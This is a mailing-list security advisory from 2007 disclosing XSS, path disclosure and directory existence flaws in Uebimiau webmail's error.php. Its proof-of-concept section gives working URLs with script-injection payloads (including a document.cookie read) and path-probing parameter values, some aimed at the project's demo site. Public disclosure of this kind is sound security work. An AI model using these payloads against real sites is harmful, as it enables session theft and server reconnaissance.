Full Disclosure mailing list archives
Uebimiau Webmail Multiple Vulnerabilities
From: "Michal Majchrowicz" <m.majchrowicz () gmail com>
Date: Tue, 29 May 2007 00:13:15 +0200
Synopsis: Multiple Vulnerabilities Introduction: Uebimiau is an open source webmail interface. Details: Uebimiau doesn't correctly handle the $_GET array in error.php. Many vulnerabilities have been already discovered, but I would like to introduce few new ones: 1) XSS 2) Three Web Server Directory Path Disclosure Vulnerabilities 3) Directory Existence Vulnerability PoC: <http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E?subject=server&server=test> http://www.uebimiau.org/demo/pop3/error.php?selected_theme=%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.uebimiau.org/demo/pop3/error.php?smarty=test http://www.uebimiau.org/demo/pop3/error.php?selected_theme=test http://www.uebimiau.org/demo/pop3/error.php?selected_theme=: http://www.uebimiau.org/demo/pop3/error.php?selected_theme=/etc/apache2/../../var/www/web6/web/demo/pop3/themes/uebimiau/ Regards Michal Majchrowicz. Hack.pl
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Uebimiau Webmail Multiple Vulnerabilities Michal Majchrowicz (May 28)